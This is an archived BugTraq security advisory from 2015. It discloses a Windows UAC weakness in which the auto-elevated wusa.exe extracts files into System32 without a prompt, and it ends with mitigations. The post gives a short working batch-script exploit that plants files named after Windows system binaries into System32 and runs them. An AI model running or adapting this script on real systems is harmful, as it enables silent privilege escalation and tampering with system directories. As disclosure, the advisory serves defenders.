BugTraq
Defense in depth -- the Microsoft way (part 31): UAC is for binary planting Mar 15 2015 03:48PM
Stefan Kanthak (stefan kanthak nexgo de)
Hi @ll,

the exploit shown here should be well-known to every
Windows administrator, developer or QA engineer.

In Microsoft's own terms it doesn't qualify as security
vulnerability since UAC is a security feature, not a
security boundary.

Preconditions:

* a user running as "protected Administrator" on Windows 7
and newer with standard UAC settings.

JFTR: this is the default for "out-of-the-box" installations
and typically almost never changed!

* some executables in directory %SystemRoot%\, but not in
directory %SystemRoot%\System32\ (or %SystemRoot%\SysWoW64\);

JFTR: REGEDIT.EXE is one of these executables, and it has a
manifest which specifies
<requestedExecutionLevel level="highestAvailable">,
so users running as "protected Administrator" are
accustomed to the UAC prompt when they start REGEDIT.EXE
and will most probably acknowledge the privilege elevation.

Exploit (to be run as a batch script):

for %%! in ("%SystemRoot%\*.exe" "%SystemRoot%\*.dll") do call :PLANT "%%~nx!"
exit /b
:PLANT
if exist "%SystemRoot%\System32\%~1" goto :EOF
copy NUL: "%TEMP%\%~1"
"%SystemRoot%\System32\makecab.exe" "%TEMP%\%~1" "%TEMP%\dummy.cab"
"%SystemRoot%\System32\wusa.exe" "%TEMP%\dummy.cab" /extract:"%SystemRoot%\System32"
if /I "%~x1" == ".exe" "%~1" /?

WUSA.EXE is one of the about 70 Microsoft programs which are
UAC-autoelevated since Windows 7, so the user doesn't need to
answer the UAC prompt when the batch script plants a file in
the directory "%SystemRoot%\System32\"

Mitigations:

* set the UAC control to "ask always" (as it was in Windows Vista)

* remove the user accounts created during setup from the
"Administrators" group and place them in the "Users" group, i.e.
demote these accounts from "Administrator" to "Standard user".

Start->Run "control.exe userpasswords2" alias
"rundll32.exe netplwiz.dll,UsersRunDll" allows this operation!

JFTR: don't forget to enable the builtin "Administrator" account.

Cf. <http://windows.microsoft.com/en-us/windows/user-accounts-faq>

| There are three types of accounts. Each type gives you a different
| level of control over the PC:
| * Administrator accounts provide the most control over a PC, and
| should be used sparingly. You probably created this type of
| account when you first started using your PC.
| * Standard accounts are for everyday use. If you're setting up
| accounts for other people on your PC, it's a good idea to give
| them standard accounts.

stay tuned
Stefan Kanthak

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus